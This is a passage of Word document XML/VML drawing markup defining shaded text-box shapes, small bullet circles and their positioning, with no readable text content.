                              <a:gd name="T46" fmla="+- 0 1384 1202"/>
                              <a:gd name="T47" fmla="*/ 138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Text Box 36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201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4" o:spid="_x0000_s2031" style="position:absolute;margin-left:96.5pt;margin-top:60.1pt;width:37.1pt;height:9.15pt;z-index:-15535616;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1202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">
                <v:shape id="Freeform 366" o:spid="_x0000_s2032" style="position:absolute;left:1930;top:1201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DjYMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP0WrCQBRE34X+w3ILfZG6a5VQo6uUQmkqQmn0Ay7Z&#10;2ySYvRuy2yT+fVcQfBxm5gyz2Y22ET11vnasYT5TIIgLZ2ouNZyOH8+vIHxANtg4Jg0X8rDbPkw2&#10;mBo38A/1eShFhLBPUUMVQptK6YuKLPqZa4mj9+s6iyHKrpSmwyHCbSNflEqkxZrjQoUtvVdUnPM/&#10;q+Hz69D48YSZPeJqvv8+q0M/VVo/PY5vaxCBxnAP39qZ0bBIlnA9E4+A3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cONgxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,1384;21,1384;18,1384;0,1363;0,1360;0,1223;21,1202;720,1202;741,1223;741,1363;723,1384;720,1384" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 365" o:spid="_x0000_s2033" type="#_x0000_t202" style="position:absolute;left:1930;top:1201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J5Ns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jBOJ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snk2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8137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1033145</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="362" name="Freeform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676 1627"/>
                            <a:gd name="T3" fmla="*/ 1676 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 1676 1627"/>
                            <a:gd name="T7" fmla="*/ 1676 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 1675 1627"/>
                            <a:gd name="T11" fmla="*/ 1675 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1655 1627"/>
                            <a:gd name="T15" fmla="*/ 1655 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1648 1627"/>
                            <a:gd name="T19" fmla="*/ 1648 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1627 1627"/>
                            <a:gd name="T23" fmla="*/ 1627 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1627 1627"/>
                            <a:gd name="T27" fmla="*/ 1627 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1651 1627"/>
                            <a:gd name="T31" fmla="*/ 1651 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1655 1627"/>
                            <a:gd name="T35" fmla="*/ 1655 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 1676 1627"/>
                            <a:gd name="T39" fmla="*/ 167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0A896" id="Freeform 363" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:81.35pt;width:2.45pt;height:2.45pt;z-index:-15535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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1064260;13335,1064260;11430,1063625;0,1050925;0,1046480;13335,1033145;17780,1033145;31115,1048385;31115,1050925;17780,10642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8188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986790</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="359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1554"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="360" name="Freeform 362"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1554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1737 1554"/>
                              <a:gd name="T3" fmla="*/ 1737 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 1737 1554"/>
                              <a:gd name="T7" fmla="*/ 1737 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 1736 1554"/>
                              <a:gd name="T11" fmla="*/ 1736 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 1715 1554"/>
                              <a:gd name="T15" fmla="*/ 1715 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 1712 1554"/>
                              <a:gd name="T19" fmla="*/ 1712 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 1575 1554"/>
                              <a:gd name="T23" fmla="*/ 1575 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 1554 1554"/>
                              <a:gd name="T27" fmla="*/ 1554 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 1554 1554"/>
                              <a:gd name="T31" fmla="*/ 1554 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 1575 1554"/>
                              <a:gd name="T35" fmla="*/ 1575 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 1715 1554"/>
                              <a:gd name="T39" fmla="*/ 1715 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 1736 1554"/>
                              <a:gd name="T43" fmla="*/ 1736 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 1737 1554"/>
                              <a:gd name="T47" fmla="*/ 173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Text Box 36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54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0" o:spid="_x0000_s2034" style="position:absolute;margin-left:96.5pt;margin-top:77.7pt;width:41.35pt;height:9.15pt;z-index:-15534592;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1554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">
                <v:shape id="Freeform 362" o:spid="_x0000_s2035" style="position:absolute;left:1930;top:1554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bQb78A&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPyQrCMBC9C/5DGMGLaKqCaDWKC6IHLy6Ix6EZ22Iz&#10;KU3U+vfmIHh8vH22qE0hXlS53LKCfi8CQZxYnXOq4HLedscgnEfWWFgmBR9ysJg3GzOMtX3zkV4n&#10;n4oQwi5GBZn3ZSylSzIy6Hq2JA7c3VYGfYBVKnWF7xBuCjmIopE0mHNoyLCkdUbJ4/Q0Cg6rTTrZ&#10;Xnf+JgeXSedxW6FOjkq1W/VyCsJT7f/in3uvFQxHYX44E46AnH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ptBvvwAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABAD1AAAAhAMAAAAA&#10;" path="m805,183r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-17,21l805,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,1737;21,1737;18,1736;0,1715;0,1712;0,1575;21,1554;805,1554;826,1575;826,1715;809,1736;805,1737" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 361" o:spid="_x0000_s2036" type="#_x0000_t202" style="position:absolute;left:1930;top:1554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l/NcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7qxhVCjq4hYKBSKMR48PrPP&#10;ZDH7Nma3mv77rlDwOMzMN8xi1dtG3KjzxrGC6SQBQVw6bbhScCg+xu8gfEDW2DgmBb/kYbUcDhaY&#10;aXfnnG77UIkIYZ+hgjqENpPSlzVZ9BPXEkfv7DqLIcqukrrDe4TbRr4mSSotGo4LNba0qam87H+s&#10;gvWR8625fp92+Tk3RTFL+Cu9KPUy6tdzEIH68Az/tz+1grd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iX81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8240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1249045</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="358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016 1967"/>
                            <a:gd name="T3" fmla="*/ 2016 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 2016 1967"/>
                            <a:gd name="T7" fmla="*/ 2016 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 2015 1967"/>
                            <a:gd name="T11" fmla="*/ 2015 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1995 1967"/>
                            <a:gd name="T15" fmla="*/ 1995 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1988 1967"/>
                            <a:gd name="T19" fmla="*/ 1988 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1967 1967"/>
                            <a:gd name="T23" fmla="*/ 1967 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1967 1967"/>
                            <a:gd name="T27" fmla="*/ 1967 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1992 1967"/>
                            <a:gd name="T31" fmla="*/ 1992 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1995 1967"/>
                            <a:gd name="T35" fmla="*/ 1995 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2016 1967"/>
                            <a:gd name="T39" fmla="*/ 201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DBE93" id="Freeform 359" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:98.35pt;width:2.45pt;height:2.45pt;z-index:-1553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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1280160;13335,1280160;11430,1279525;0,1266825;0,1262380;13335,1249045;17780,1249045;31115,1264920;31115,1266825;17780,12801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8291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1202690</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="355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1894"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="356" name="Freeform 358"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1894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2077 1894"/>
                              <a:gd name="T3" fmla="*/ 2077 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 2077 1894"/>
                              <a:gd name="T7" fmla="*/ 2077 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 2076 1894"/>
                              <a:gd name="T11" fmla="*/ 2076 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 2056 1894"/>
                              <a:gd name="T15" fmla="*/ 2056 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 2052 1894"/>
                              <a:gd name="T19" fmla="*/ 2052 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 1916 1894"/>
                              <a:gd name="T23" fmla="*/ 1916 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 1894 1894"/>
                              <a:gd name="T27" fmla="*/ 1894 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 1894 1894"/>
                              <a:gd name="T31" fmla="*/ 1894 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 1916 1894"/>
                              <a:gd name="T35" fmla="*/ 1916 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 2056 1894"/>
                              <a:gd name="T39" fmla="*/ 2056 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 2076 1894"/>
                              <a:gd name="T43" fmla="*/ 2076 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912"/>
                              <a:gd name="T46" fmla="+- 0 2077 1894"/>
                              <a:gd name="T47" fmla="*/ 207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2"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="912" y="162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894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6" o:spid="_x0000_s2037" style="position:absolute;margin-left:96.5pt;margin-top:94.7pt;width:45.6pt;height:9.15pt;z-index:-15533568;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1894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">
                <v:shape id="Freeform 358" o:spid="_x0000_s2038" style="position:absolute;left:1930;top:1894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4JZsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WrCQBSE7wu+w3KE3ulGpdpGN0HE/giCVPsAh+wx&#10;G8yeTbJbTd++WxB6OczMN8wq720trtT5yrGCyTgBQVw4XXGp4Ov0OnoG4QOyxtoxKfghD3k2eFhh&#10;qt2NP+l6DKWIEPYpKjAhNKmUvjBk0Y9dQxy9s+sshii7UuoObxFuazlNkrm0WHFcMNjQxlBxOX5b&#10;Be3boSJ+307b1rvFqdgbs3vplXoc9usliEB9+A/f2x9awexpDn9n4hG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/glmxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m890,183r-869,l18,182,,162r,-4l,22,21,,890,r22,22l912,162r-18,20l890,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,2077;21,2077;18,2076;0,2056;0,2052;0,1916;21,1894;890,1894;912,1916;912,2056;894,2076;890,2077" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 357" o:spid="_x0000_s2039" type="#_x0000_t202" style="position:absolute;left:1930;top:1894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CIZ8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LX8R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ECIZ8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8342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1473200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="354" name="Freeform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368 2320"/>
                            <a:gd name="T3" fmla="*/ 2368 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 2368 2320"/>
                            <a:gd name="T7" fmla="*/ 2368 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 2368 2320"/>
                            <a:gd name="T11" fmla="*/ 2368 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 2347 2320"/>
                            <a:gd name="T15" fmla="*/ 2347 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 2341 2320"/>
                            <a:gd name="T19" fmla="*/ 2341 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 2320 2320"/>
                            <a:gd name="T23" fmla="*/ 2320 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 2320 2320"/>
                            <a:gd name="T27" fmla="*/ 2320 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 2344 2320"/>
                            <a:gd name="T31" fmla="*/ 2344 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 2347 2320"/>
                            <a:gd name="T35" fmla="*/ 2347 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2368 2320"/>
                            <a:gd name="T39" fmla="*/ 2368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B4065" id="Freeform 355" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:116pt;width:2.45pt;height:2.45pt;z-index:-1553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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1503680;13335,1503680;11430,1503680;0,1490345;0,1486535;13335,1473200;17780,1473200;31115,1488440;31115,1490345;17780,150368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8393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1426845</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="351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2247"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="352" name="Freeform 354"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="2246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2429 2247"/>
                              <a:gd name="T3" fmla="*/ 2429 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 2429 2247"/>
                              <a:gd name="T7" fmla="*/ 2429 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 2428 2247"/>
                              <a:gd name="T11" fmla="*/ 2428 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 2408 2247"/>
                              <a:gd name="T15" fmla="*/ 2408 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 2405 2247"/>
                              <a:gd name="T19" fmla="*/ 2405 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 2268 2247"/>
                              <a:gd name="T23" fmla="*/ 2268 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 2247 2247"/>
                              <a:gd name="T27" fmla="*/ 2247 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 2247 2247"/>
                              <a:gd name="T31" fmla="*/ 2247 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 2268 2247"/>
                              <a:gd name="T35" fmla="*/ 2268 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 2408 2247"/>
                              <a:gd name="T39" fmla="*/ 2408 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 2428 2247"/>
                              <a:gd name="T43" fmla="*/ 2428 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 2429 2247"/>
                              <a:gd name="T47" fmla="*/ 242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1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2246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2" o:spid="_x0000_s2040" style="position:absolute;margin-left:96.5pt;margin-top:112.35pt;width:49.85pt;height:9.15pt;z-index:-15532544;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,2247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">
                <v:shape id="Freeform 354" o:spid="_x0000_s2041" style="position:absolute;left:1930;top:2246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VosYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KEXopujFTa6CZIQ6EHK2jt/Zl9&#10;JsHs25jdaPz33UKhx2FmvmFW2WAacaXO1ZYVzKYRCOLC6ppLBYev98kLCOeRNTaWScGdHGTp6GGF&#10;ibY33tF170sRIOwSVFB53yZSuqIig25qW+LgnWxn0AfZlVJ3eAtw08g4ihbSYM1hocKW3ioqzvve&#10;KPi8vMo8b87rp+3m1Lv++H2c65lSj+NhvQThafD/4b/2h1Ywf47h90w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VosYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m976,182r-955,l18,181,,161r,-3l,21,21,,976,r21,21l997,161r-18,20l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,2429;21,2429;18,2428;0,2408;0,2405;0,2268;21,2247;976,2247;997,2268;997,2408;979,2428;976,2429" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 353" o:spid="_x0000_s2042" type="#_x0000_t202" style="position:absolute;left:1930;top:2246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uOZMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNKxVNXUWKglCQxnjw+Mw+&#10;k8Xs25hdNf57Vyh4HGbmG2Yy62wtLtR641jBRz8BQVw4bbhUsM2X7yMQPiBrrB2Tght5mE1fXyaY&#10;anfljC6bUIoIYZ+igiqEJpXSFxVZ9H3XEEfv4FqLIcq2lLrFa4TbWn4myVBaNBwXKmzop6LiuDlb&#10;BfMdZwtzWu//skNm8nyc8O/wqFTvrZt/gwjUhWf4v73SCgZf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e45k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8444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1689100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="350" name="Freeform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709 2660"/>
                            <a:gd name="T3" fmla="*/ 2709 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 2709 2660"/>
                            <a:gd name="T7" fmla="*/ 2709 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 2708 2660"/>
                            <a:gd name="T11" fmla="*/ 2708 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 2687 2660"/>
                            <a:gd name="T15" fmla="*/ 2687 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 2681 2660"/>
                            <a:gd name="T19" fmla="*/ 2681 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 2660 2660"/>
                            <a:gd name="T23" fmla="*/ 2660 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 2660 2660"/>
                            <a:gd name="T27" fmla="*/ 2660 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 2684 2660"/>
                            <a:gd name="T31" fmla="*/ 2684 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 2687 2660"/>
                            <a:gd name="T35" fmla="*/ 2687 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2709 2660"/>
                            <a:gd name="T39" fmla="*/ 270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FF5B0" id="Freeform 351" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:133pt;width:2.45pt;height:2.45pt;z-index:-1553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" path="m28,49r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1720215;13335,1720215;11430,1719580;0,1706245;0,1702435;13335,1689100;17780,1689100;31115,1704340;31115,1706245;17780,172021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8496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1642745</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="363220" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="347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16205"/>
                          <a:chOff x="1930" y="2587"/>
                          <a:chExt cx="572" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
